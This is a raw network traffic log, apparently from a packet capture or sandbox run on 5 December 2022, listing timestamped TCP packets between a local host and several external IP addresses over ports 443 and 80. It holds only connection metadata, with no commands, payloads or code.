                                                                                                                                                                          Dec 5, 2022 15:13:35.136280060 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.136336088 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.136509895 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.136560917 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.136707067 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.136737108 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.136887074 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.136923075 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.137065887 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.137161016 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.137311935 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.137399912 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.137546062 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.137628078 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.137932062 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.137974977 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.138293982 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.138328075 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.138592958 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.138761044 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.138834000 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.138873100 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.139163017 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.139194965 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.139378071 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.139415979 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.139441013 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.139578104 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.139642000 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.139848948 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.139898062 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.140044928 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.140103102 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.140273094 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.140328884 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.140541077 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.140583992 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.140726089 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.140743017 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.140952110 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.140971899 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.141093969 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.141113997 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.141134024 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.141264915 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.141284943 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.141303062 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.141412020 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.141412973 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.141439915 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.141599894 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.141621113 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.141756058 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.141765118 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.141782045 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.141922951 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.141942024 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.142057896 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.142086983 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.142107964 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.142247915 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.142272949 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.142463923 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.142486095 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.142616987 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.142663002 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.142683983 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.142760992 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.142851114 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.142869949 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.143007040 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.143109083 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.143121958 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.143140078 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.143265963 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.143316984 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.143335104 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.143522978 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.143568039 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.143599987 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.143623114 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.143706083 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.143805027 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.143825054 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.143994093 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.144012928 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.144155979 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.144175053 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.144280910 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.144320011 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.144344091 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.144426107 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.144506931 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.144530058 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.144690990 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.144700050 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.144722939 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.144823074 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.144823074 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.144872904 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.145020008 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.145040989 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.145181894 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.145205021 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.145361900 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.145380020 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.145536900 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.145551920 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.145637035 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.145776033 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.145792007 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.145802975 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.145840883 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.145948887 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.146042109 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.146059036 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.146106958 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.146192074 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.146260023 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.146332026 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.146342039 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.146353006 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.146439075 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.146486998 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.146507025 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.146630049 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.146637917 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.146647930 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.146847010 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.146855116 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.146950960 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.147032022 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.147074938 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.147193909 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.147193909 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.147211075 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.147386074 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.147486925 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.147557974 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.147578955 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.147605896 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.147660971 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:35.147747040 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.147820950 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.147820950 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.454756021 CET49823443192.168.11.20142.250.184.225
                                                                                                                                                                          Dec 5, 2022 15:13:35.454771996 CET44349823142.250.184.225192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:14:45.269778013 CET4983580192.168.11.20198.58.118.167
                                                                                                                                                                          Dec 5, 2022 15:14:45.405739069 CET8049835198.58.118.167192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:14:45.405956030 CET4983580192.168.11.20198.58.118.167
                                                                                                                                                                          Dec 5, 2022 15:14:45.406071901 CET4983580192.168.11.20198.58.118.167
                                                                                                                                                                          Dec 5, 2022 15:14:45.542540073 CET8049835198.58.118.167192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:14:45.542573929 CET8049835198.58.118.167192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:14:45.542947054 CET4983580192.168.11.20198.58.118.167
                                                                                                                                                                          Dec 5, 2022 15:14:45.543109894 CET4983580192.168.11.20198.58.118.167
                                                                                                                                                                          Dec 5, 2022 15:14:45.678862095 CET8049835198.58.118.167192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:00.694658995 CET4983780192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:00.752454996 CET804983745.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:00.752674103 CET4983780192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:00.752768040 CET4983780192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:00.810906887 CET804983745.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:00.844695091 CET804983745.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:00.844836950 CET804983745.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:00.845160961 CET4983780192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:01.764205933 CET4983780192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:02.779553890 CET4983880192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:02.834084034 CET804983845.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:02.834445953 CET4983880192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:02.834558010 CET4983880192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:02.889003992 CET804983845.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:02.921298027 CET804983845.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:02.921377897 CET804983845.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:02.921628952 CET4983880192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:03.841695070 CET4983880192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:04.857480049 CET4983980192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:04.916297913 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:04.916645050 CET4983980192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:04.917323112 CET4983980192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:04.976111889 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:04.976361990 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:04.976377964 CET4983980192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:04.976583004 CET4983980192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:04.976736069 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:04.976922989 CET4983980192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:04.977019072 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:04.977214098 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:04.977248907 CET4983980192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:04.977452040 CET4983980192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:04.977581024 CET4983980192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:04.977647066 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:04.977924109 CET4983980192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:04.978367090 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:04.978442907 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:04.978534937 CET4983980192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:04.978607893 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:04.978668928 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:04.978740931 CET4983980192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:04.978910923 CET4983980192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:04.979038000 CET4983980192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:05.035202026 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:05.035304070 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:05.035377026 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:05.035442114 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:05.035487890 CET4983980192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:05.035506964 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:05.035635948 CET4983980192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:05.035693884 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:05.035706043 CET4983980192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:05.035918951 CET4983980192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:05.035948038 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:05.036422968 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:05.037075996 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:05.037204027 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:05.037797928 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:05.081753016 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:05.094446898 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:05.094544888 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:05.094825983 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:05.094918966 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:05.134186983 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:05.134294987 CET804983945.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:05.134679079 CET4983980192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:05.919473886 CET4983980192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:06.935040951 CET4984080192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:06.993151903 CET804984045.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:06.993374109 CET4984080192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:06.993468046 CET4984080192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:07.051781893 CET804984045.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:07.532665014 CET804984045.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:07.532742977 CET804984045.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:07.533149004 CET4984080192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:07.533149958 CET4984080192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:15:07.591408968 CET804984045.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:12.993772984 CET4984280192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:13.279855967 CET8049842154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:13.280097008 CET4984280192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:13.280183077 CET4984280192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:13.564738035 CET8049842154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:13.616744995 CET8049842154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:13.616812944 CET8049842154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:13.617117882 CET4984280192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:13.864640951 CET8049842154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:13.864820004 CET4984280192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:13.960791111 CET8049842154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:14.292484999 CET4984280192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:15.308098078 CET4984380192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:15.589301109 CET8049843154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:15.589514017 CET4984380192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:15.589611053 CET4984380192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:15.870250940 CET8049843154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:15.922270060 CET8049843154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:15.922360897 CET8049843154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:15.922590017 CET4984380192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:16.168462038 CET8049843154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:16.168664932 CET4984380192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:16.232426882 CET8049843154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:16.604473114 CET4984380192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:17.620305061 CET4984480192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:17.902420044 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:17.902823925 CET4984480192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:17.903486013 CET4984480192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:18.185236931 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.185276985 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.185303926 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.185328960 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.185353994 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.185379028 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.185403109 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.185429096 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.185452938 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.185478926 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.185480118 CET4984480192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:18.185561895 CET4984480192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:18.185632944 CET4984480192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:18.185795069 CET4984480192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:18.467453957 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.467511892 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.467552900 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.467591047 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.467629910 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.467650890 CET4984480192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:18.467669010 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.467708111 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.467746019 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.467763901 CET4984480192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:18.467786074 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.467823982 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.467839956 CET4984480192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:18.467864037 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.467902899 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.467941999 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.467979908 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.468009949 CET4984480192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:18.468019009 CET8049844154.204.24.45192.168.11.20
